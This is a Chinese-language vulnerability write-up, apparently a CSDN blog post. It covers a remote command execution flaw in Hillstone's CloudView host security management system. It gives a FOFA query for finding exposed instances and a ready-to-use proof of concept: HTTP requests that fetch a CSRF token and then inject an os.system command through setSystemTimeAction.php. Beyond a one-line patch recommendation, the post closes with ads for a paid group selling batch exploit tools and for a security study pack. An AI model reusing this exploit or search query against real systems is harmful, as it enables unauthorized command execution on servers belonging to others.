0x01免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
0x02产品介绍
山石网科云鉴主机安全管理系统,围绕主机检测、响应、预防可持续安全运营,实现主机安全全生命周期管理。通过对主机进行脆弱性检测、东西向微隔离管控、多错点风险检测、多层级安全响应等措施,解决主机资产管理、安全加固、东西向流量防护、威胁实时检测、应急响应、失陷主机定位等安全问题,能够有效帮助安全管理人员应对日趋严峻的主机风险态。
0x03漏洞威胁
由于该软件的 Web
应用对用户的输入未进行有效过滤,直接拼接系统命令执行,造成了远程命令执行漏洞。攻击者可通过构造恶意请求,拼接命令执行任意代码,控制服务器。
影响模块:
getMessageSettingAction, /master/ajaxActions/setSystemTimeAction.php, /admin/client.php
0x04漏洞环境
FOFA:
body="山石云鉴主机安全管理系统"
0x05漏洞复现
POC
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0
0x06批量验证脚本
Nuclei验证脚本已发布
知识星球:冷漠安全
0x07修复建议
通过补丁修复
漏洞详情及批量检测POC工具请前往知识星球获取
知识星球:冷漠安全
交个朋友,限时优惠券:加入立减25
星球福利:每天更新最新漏洞POC、资料文献、内部工具等
![](https://img-
blog.csdnimg.cn/img_convert/76fd5653b180705154950b34d9b79ab3.png)
![](https://img-
blog.csdnimg.cn/img_convert/c4f459ed8e4720ff21add0176fe57b65.gif)
学习计划安排
我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!
如果你对网络安全入门感兴趣,那么你需要的话可以
点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析